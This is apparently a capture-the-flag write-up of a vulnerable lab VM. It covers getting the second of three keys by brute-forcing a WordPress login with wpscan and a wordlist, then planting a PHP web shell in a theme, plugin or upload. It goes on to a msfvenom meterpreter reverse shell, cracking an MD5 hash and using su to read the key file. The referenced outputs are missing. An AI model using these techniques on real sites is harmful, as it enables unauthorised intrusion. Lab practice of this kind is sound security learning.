After the previous article we got the first key. Now for the second key we needed to move a notch higher into the system. We had a loot.dic so the best option seeing we only have the web application facing us so far would be bruteforcing it.
root@mth3l3m3nt:~# wpscan -u http://192.168.238.101/ -U hacker123 -w ~/loot.dic -t 16
This gives us the password to the web application as we already have the username from the time we handled key 1 as below:
Now that we have the username and password it becomes easier to pivot into the server itself. There are a number of avenues in wordpress to gain a shell into the system :
- Edit an existing plugin or theme’s code and insert a minimal shell.
- upload a php shell via the add new plugin function – Access will be in the wp-content/plugins folder.
- upload a php shell to the media library – Access will be in wp-content/uploads folder.
The first instance of the shell is a minimal test to get a feel of the server. I edited the theme to add this as below using mth3l3m3nt as the controller.
On needing more persistence however it became easier to have a shell that can connect back to meterpreter. so for this we simply generate a shell with msfvenom and setup a listener in metasploit to receive the shell.
Now the only problem so far is after dropping to shell we realize we are still the user daemon:
we however notice that the password-raw.md5 allows us to read and we get a hash in there. We can crack this easy:
so after this the one thing left is to read the file as chicken in our meterpreter shell, we drop to a native shell where we are daemon and run the command as below:
su -c “cat /home/chicken/key-2-of-3.txt” -s /bin/sh chicken
One key takeaway though from this was “pay attention to detail”. Missing the permissions difference between the two files in chicken’s folder would not help one predict what is required to complete it, voila the second key is: